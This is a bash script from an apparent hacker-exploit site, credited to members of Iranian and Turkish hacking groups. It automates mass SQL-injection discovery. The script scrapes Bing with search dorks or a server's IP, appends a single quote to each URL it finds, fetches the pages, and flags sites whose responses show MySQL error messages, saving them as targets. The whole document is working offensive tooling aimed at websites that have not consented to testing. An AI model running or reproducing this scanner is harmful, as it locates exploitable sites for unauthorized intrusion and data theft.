facebook facebook twitter rss

TBH && IrIsT Sql Finder

Author: Beni_Vanda , Published: 24-02-2013
#!/bin/bash
# "***********************************************************************"
# "* In The Name Of ALLAH *"
# "* TBH && IrIsT Sql Finder *"
# "* http://turk-bh.ir/ && http://irist.ir/ *"
# "* Coded By : Beni_Vanda *"
# "* Beni_Vanda@yahoo.com *"
# "***********************************************************************"

################################################################################
#
# Gr33tz : Am!r ,C0dex ,B3HZ4D ,TaK.FaNaR ,0x0ptim0us ,MR.F@RDIN , noob
# skote_vahshat ,Sukhoi Su-37 ,Net.W0lf , rEd X ,x3o-1337 , No PM &&
# m3hdi , Sukhoi Su-71 , IR Anonymous , joker_s , Mr.epsilon ,godfather
# All Turkish/Iranian/Kurdish/Bangladesh Hackerz
#
################################################################################

function searching_Sql_Bug_With_Dork
{

page=0
last_page_check=
how_many=1
single_page=

echo -e "\e[1;31mPlease Input Dork :\e[0m: ";
read Dorkme;

echo -e "\e[1;32m[*] Searching With $Dorkme Dork plz w8 ...\e[0m"

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

url="http://www.bing.com/search?q=%27$Dorkme%27&qs=n&pq=%27$Dorkme%27&sc=0-0&sp=-1&sk=&first=${page}0&FORM=PERE"

wget -q -O domain_bing.php --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" "$url"


last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

# if no results are found, how_many is empty and the loop will exit
how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

# check for a single page of results
single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `


cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php
let page=$page+1
done

cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;


dork=`echo "$Dorkme" | cut -d '?' -f 1`


for line_test in `cat domains.txt`
do
varfor=`echo "$line_test" | egrep "$dork"`

if [ -z $varfor ]
then
echo "$line_test" >>should_delete.txt
else
echo "$line_test" | sort | uniq >>should_test.txt
fi
done


touch domain_sorted.txt;

for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

#insert ' at end of url
for varline in `cat domain_sorted.txt`
do
echo "$varline'" | sort | uniq >>should_test_sql.txt
done


for L_domain in `cat should_test_sql.txt`
do

wget -q -O sql.php --tries=1 --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" $L_domain

str=`cat "sql.php" | awk '/You have an error in your SQL syntax/ { print }'`
str2=`cat "sql.php" | awk '/b>: mysql/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then

echo -e "\e[1;36m[*] Trying ... >> [*] $L_domain >> Not Vulnerable \e[0m"
else
echo -e "\e[1;35m[*] Trying ... >> Found >> $L_domain \e[0m"
echo $L_domain >>sql_finded.txt
fi

rm -f sql.php
rm -f download.log
done

rm -f should_test_sql.txt
rm -f should_delete.txt
rm -f domains.txt
rm -f sql.php
rm -f test.txt
rm -f download.log
rm -f should_test.txt
rm -f domain_sorted.txt
}

function Search_On_Server_With_Dork()
{
page=0
last_page_check=
how_many=1
single_page=


echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER
echo -e "\e[1;31mPlz input URL Drok \e[0m: ";
read DORK_SERVER

if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
exit
fi
fi


# Check Sever Status
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching With $DORK_SERVER on $IP_SERVER Plz W8 \e[0m: ";

while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

url="http://www.bing.com/search?q=ip%3a$IP+%27$DORK_SERVER%27&qs=n&pq=ip%3a$IP+%27$DORK_SERVER%27&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

wget -q -O domain_bing.php "$url"

last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1
fi

cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

dork=`echo "$DORK_SERVER" | cut -d '?' -f 1`

for line_test_2 in `cat domains.txt`
do
varfor2=`echo "$line_test_2" | egrep "$dork"`

if [ -z $varfor2 ]
then
echo "$line_test_2" >>d.txt
else
echo "$line_test_2" | sort | uniq >>should_test.txt
fi
done


touch domain_sorted.txt;

for namedomain in `cat should_test.txt`
do
domaincut=`echo "$namedomain" | cut -d '/' -f 1`
urlgreap=`cat domain_sorted.txt | egrep $domaincut`
if [[ $urlgreap = "" ]]
then
echo "$namedomain" >>domain_sorted.txt
fi
done

#insert ' at end of url
for varline in `cat domain_sorted.txt`
do
echo "$varline'" | sort | uniq >>should_test_sql.txt
done


for L_domain in `cat should_test_sql.txt`
do

wget -q -O sql.php --tries=1 --user-agent="Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.3) Gecko/2008092416 Firefox/3.0.3" $L_domain

str=`cat "sql.php" | awk '/You have an error in your SQL syntax/ { print }'`
str2=`cat "sql.php" | awk '/b>: mysql/ { print }'`

if [[ $str = "" ]] && [[ $str2 = "" ]]
then

echo -e "\e[1;36m[*] Trying ... >> [*] $L_domain >> Not Vulnerable \e[0m"
else
echo -e "\e[1;35m[*] Trying ... >> Found >> $L_domain \e[0m"
echo $L_domain >>sql_finded.txt
fi

rm -f sql.php
rm -f download.log
done
rm -f should_test_sql.txt
rm -f should_test.txt
rm -f d.txt
rm -f domains.txt
rm -f domain_sorted.txt
rm -f sql.php
rm -f test.txt
rm -f download.log

}

function Auto_search_Sql_On_Server()
{

page=0
last_page_check=
how_many=1
single_page=


echo -e "\e[1;31mPlz input Server IP Or Domain \e[0m: ";
read IP_SERVER

if [ `echo "$IP_SERVER" | egrep "(([0-9]+\.){3}[0-9]+)|\[[a-f0-9:]+\]"` ]; then
IP="$IP_SERVER"
else
IP=`resolveip -s "$IP_SERVER"`
if [ "$?" != 0 ]; then
echo "Error: cannot resolve $IP_SERVER to an IP"
exit
fi
fi


# Check Sever Status
ping -c 3 $IP
if [ $? -ne 0 ]
then
echo "Server $IP is down :| >> Program Exit "
exit 1
fi

echo -e "\e[1;35mSearching on $IP_SERVER Server Plz W8 \e[0m: ";


while [ -z "$last_page_check" ] && [ -n "$how_many" ] && [ -z "$single_page" ]; do

url="http://www.bing.com/search?q=ip%3a$IP+Warning%3A+mysql_&qs=n&pq=ip%3a$IP+Warning%3A+mysql_&sc=8-26&sp=-1&sk=&first=${page}1&FORM=PERE"

#http://www.bing.com/search?q=ip%3A83.145.246.156+Warning%3A+mysql_&qs=n&form=QBRE&pq=ip%3A83.145.246.156+warning%3A+mysql_&sc=8-33&sp=-1&sk=

wget -q -O domain_bing.php "$url"

last_page_check=`egrep -o '<span class="sb_count" id="count">[0-9]+-([0-9]+) of (\1)' domain_bing.php`

how_many=`egrep -o '<span class="sb_count" id="count">[^<]+' domain_bing.php | cut -d '>' -f 2|cut -d ' ' -f 1-3`

single_page=`egrep -o '<span class="sb_count" id="count">[0-9] results' domain_bing.php `

cat "domain_bing.php" | egrep -o "<h3><a href=\"[^\"]+" domain_bing.php | cut -d '"' -f 2 >> alldomain_bing.txt
rm -f domain_bing.php;
let page=$page+1;
done

if [ `ls -l alldomain_bing.txt | awk '{print $5}'` -eq 0 ]
then
echo -e "\e[1;31mNot Found $DORK_SERVER on $IP_SERVER ...\e[0m"
echo -e "\e[1;31mExited !! ...\e[0m"
exit 1
fi

cat alldomain_bing.txt | awk '{gsub("http://","")}1' | awk '{gsub("https://","")}1' | sed '/www./s///g' | tr '[:upper:]' '[:lower:]' | sort | uniq >> domains.txt
rm -f alldomain_bing.txt;

}


function main()
{

echo -e "\e[1;33m1) Searching Sql Bug on Serevr with Dork <IP> <DORK> \e[0m"
echo -e "\e[1;33m2) Searching Sql bug With Dork <DORK> \e[0m"
echo -e "\e[1;33m3) Exit \e[0m"

echo -e "\e[1;31mPlease select one of the following \e[0m: ";
read option;

case $option in
1)
Search_On_Server_With_Dork;;
2)
searching_Sql_Bug_With_Dork;;
3)
exit 0;;
*)
echo "Wrong parametr ; Plz try again ...";
exit 1;;
esac
}

main;

Like us on Facebook :